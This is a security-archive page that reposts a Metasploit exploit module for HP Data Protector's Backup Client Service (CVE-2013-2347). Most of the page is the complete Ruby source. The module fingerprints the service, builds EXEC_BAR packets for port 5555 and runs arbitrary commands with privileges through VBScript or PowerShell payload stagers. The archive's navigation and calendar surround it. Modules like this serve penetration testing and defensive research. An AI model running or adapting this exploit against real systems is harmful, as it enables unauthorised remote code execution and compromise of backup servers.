what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HP Data Protector Backup Client Service Remote Code Execution

HP Data Protector Backup Client Service Remote Code Execution
Posted Mar 6, 2014
Authored by Aniway, juan vazquez | Site metasploit.com

This Metasploit module abuses the Backup Client Service (OmniInet.exe) to achieve remote code execution. The vulnerability exists in the EXEC_BAR operation, which allows to execute arbitrary processes. This Metasploit module has been tested successfully on HP Data Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2.

tags | exploit, remote, arbitrary, code execution
systems | windows
advisories | CVE-2013-2347
SHA-256 | 8a6cfcccffe2b708db0732be2f11e898b34ee027cca6bf2e6269d9b4fdfe7ad3

HP Data Protector Backup Client Service Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
include Msf::Exploit::CmdStagerVBS

def initialize(info = {})
super(update_info(info,
'Name' => 'HP Data Protector Backup Client Service Remote Code Execution',
'Description' => %q{
This module abuses the Backup Client Service (OmniInet.exe) to achieve remote code
execution. The vulnerability exists in the EXEC_BAR operation, which allows to
execute arbitrary processes. This module has been tested successfully on HP Data
Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2.
},
'Author' =>
[
'Aniway.Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-2347' ],
[ 'BID', '64647' ],
[ 'ZDI', '14-008' ],
[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422' ],
[ 'URL', 'http://ddilabs.blogspot.com/2014/02/fun-with-hp-data-protector-execbar.html' ]
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true
},
'DefaultOptions' =>
{
'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
},
'Platform' => 'win',
'Targets' =>
[
[ 'HP Data Protector 6.20 build 370 / VBScript CMDStager', { } ],
[ 'HP Data Protector 6.20 build 370 / Powershell', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 02 2014'))

register_options(
[
Opt::RPORT(5555),
OptString.new('CMDPATH', [true, 'The cmd.exe path', 'c:\\windows\\system32\\cmd.exe'])
],
self.class)
end

def check
fingerprint = get_fingerprint

if fingerprint.nil?
return Exploit::CheckCode::Unknown
end

print_status("#{peer} - HP Data Protector version #{fingerprint}")

if fingerprint =~ /HP Data Protector A\.06\.(\d+)/
minor = $1.to_i
else
return Exploit::CheckCode::Safe
end

if minor < 21
return Exploit::CheckCode::Appears
elsif minor == 21
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Detected
end

end

def exploit
if target.name =~ /VBScript CMDStager/
# 7500 just in case, to be sure the command fits after
# environment variables expansion
execute_cmdstager({:linemax => 7500})
elsif target.name =~ /Powershell/
# Environment variables are not being expanded before, neither in CreateProcess
command = cmd_psh_payload(payload.encoded).gsub(/%COMSPEC% /, "")
if command.length > 8000
# Windows 2008 Command Prompt Max Length is 8191
fail_with(Failure::BadConfig, "#{peer} - The selected paylod is too long to execute through powershell in one command")
end
print_status("#{peer} - Exploiting through Powershell...")
exec_bar(datastore['CMDPATH'], command, "\x00")
end
end

def peer
"#{rhost}:#{rport}"
end

def build_pkt(fields)
data = "\xff\xfe" # BOM Unicode
fields.each do |v|
data << "#{Rex::Text.to_unicode(v)}\x00\x00"
data << Rex::Text.to_unicode(" ") # Separator
end

data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator
return [data.length].pack("N") + data
end

def get_fingerprint
ommni = connect
ommni.put(rand_text_alpha_upper(64))
resp = ommni.get_once(-1)
disconnect

if resp.nil?
return nil
end

Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
end

def exec_bar(cmd, *args)
connect
pkt = build_pkt([
"2", # Message Type
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
"11", # Opcode EXEC_BAR
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
"#{cmd}", # Executable
rand_text_alpha(8)
].concat(args))
sock.put(pkt)
# In my testings the default timeout (10) isn't enough
begin
res = sock.get_once(-1, 20)
rescue EOFError # happens when using the Powershell method
disconnect
return
end
fail_with(Failure::Unknown, "#{peer} - Expected answer not received... aborting...") unless exec_bar?(res)
disconnect
end

def exec_bar?(data)
return false if data.blank?
data_unpacked = data.unpack("NnVv")
data_unpacked.length == 4 && data_unpacked[0] == 8 && data_unpacked[1] == 0xfffe && data_unpacked[2] == 0x36 && data_unpacked[3] == 0
end

def execute_command(cmd, opts = {})
exec_bar(datastore['CMDPATH'], "/c #{cmd}", "\x00")
end

def get_vbs_string(str)
vbs_str = ""
str.each_byte { |b|
vbs_str << "Chr(#{b})+"
}

return vbs_str.chomp("+")
end

# Make the modifications required to the specific encoder
# This exploit uses an specific encoder because quotes (")
# aren't allowed when injecting commands
def execute_cmdstager_begin(opts)
var_decoded = @stager_instance.instance_variable_get(:@var_decoded)
var_encoded = @stager_instance.instance_variable_get(:@var_encoded)
decoded_file = "#{var_decoded}.exe"
encoded_file = "#{var_encoded}.b64"
@cmd_list.each do |command|
# Because the exploit kills cscript processes to speed up and reliability
command.gsub!(/cscript \/\/nologo/, "wscript //nologo")
command.gsub!(/CHRENCFILE/, get_vbs_string(encoded_file))
command.gsub!(/CHRDECFILE/, get_vbs_string(decoded_file))
end
end

end
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close